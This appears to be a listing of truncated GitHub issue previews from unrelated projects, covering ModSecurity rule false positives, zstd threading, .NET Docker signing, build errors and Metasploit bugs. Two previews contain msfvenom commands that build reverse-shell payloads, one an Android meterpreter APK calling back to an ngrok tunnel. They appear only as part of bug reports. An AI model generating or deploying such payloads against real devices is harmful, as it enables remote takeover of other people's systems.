-
The rule 920220 has been in CRS since before the time we moved to github and CRS 3. There was a complicated regex that was later simplified. In the simplified form, it triggers a lot of false positive…
-
It looks like the the multithreaded implementation in the base zstd is a bit slower than the other available threading implementations:
zstd-mt : https://github.com/mcmilk/zstdmt/releases
pzstd: htt…
-
**Describe the bug**
ModSecurity sometimes doesn't fully log all of the rule IDs triggered within a request, this is annoying with false positives as you'll have to go through multiple tuning itera…
-
$ msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=17629 R > /sdcard/666.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch …
-
## Overview
This issue will cover the implementation details to enable https://github.com/dotnet/dotnet-docker/issues/4589
I have created a "vertical slice" of the signing infrastructure to veri…
-
## Type of Issue
Incorrect blocking (false positive)
## Description
`o.havingu@gmail.com` is detected as conditional SQL injection attempt
Email address is fictional
`Message: Wa…
-
The `solaris/x86/shell_reverse_tcp` and `solaris/x86/shell_bind_tcp` payloads segfault on Solaris 11.1.
```
./msfvenom -f elf -p solaris/x86/shell_reverse_tcp LHOST=172.16.191.244 LPORT=1337 > rev…
-
After running succesfully
```
cmake .. -DADVANCED_SENSING=ON -DTARGET_TRACKING_SAMPLE=ON
````
I am unable to perform sudo make -j7 install
Error returned is
```
sudo make -j7 install
[ 13%] B…
-
## Steps to reproduce
- I used a source install, from the official repo on `master` branch
- git clone [...]
- Used `rvm` to setup a ruby env match the `.ruby-version`
- `rvm install ruby-…
-
Sorry to bring it up again, but I have done a lot of looking through issues and I think mine is new. I get `Segmentation fault (core dumped)`. It's **not** a connection issue; I always have my handler…